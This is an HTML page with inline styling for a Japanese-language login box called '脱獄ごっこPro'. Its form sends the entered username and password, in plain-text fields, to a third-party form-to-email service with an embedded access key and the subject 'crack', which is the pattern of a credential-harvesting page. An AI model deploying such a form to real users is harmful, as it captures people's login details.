<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>main_frontsight</title>
    <link rel="stylesheet" href="style.css" />
  </head>

  <body>
<div class="contact-form">
    <p>脱獄ごっこProにログイン</p>

    <form action="https://api.staticforms.xyz/submit" method="post">
      <input type="hidden" name="accessKey" value="b60bc6da-6ef8-4e65-a2e1-921aee9c7727">
      <input type="hidden" name="subject" value="crack">

       <div class="item">
        <input type="text" name="name" placeholder="ユーザーネーム" minlength="3" maxlength="20" pattern="^[a-zA-Z0-9_@]+$" required>
      </div>
<br>
      <div class="item">
       <input type="text" name="name" placeholder="パスワード" minlength="8" class="inputs" required/>
      </div>
   <br> 
        <div class="button-area">
          <input type="submit" value="ログイン" />
        </div>
      </div>
    </form>
</div>
  </body>
  <style>


   body {
       display: flex;
       justify-content: center;
       align-items: center;
       height: 100vh;
       margin: 0;
       background-color: #ffffff;
       font-family: 'Arial', sans-serif;
     }
 
    .contact-form {
      background-color: #505050;
      padding: 20px;
      border-radius: 10px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
      width: 320px;
      height: 350px;
      text-align: center;
    }


    
    p {
    font-size: 20px;
   font-family: sans-serif;
      font-weight: bold;
      color:  #ffffff;
    }

    input[type="text"] {
  outline:solid 0.2px #414141;
   outline: none;
   border-radius:30px;
  color: #ffffff;
  background-color: #626262; 
  border: solid 1px #aaa;
  padding: 10px;
  height: 20px;
  width: 300px;
  font-size: 15px;
}
    input[type="submit"] {
    border-radius:30px;
    height: 44px;
    width: 324px;
    font-size: 25px
}
  </style>
</html>


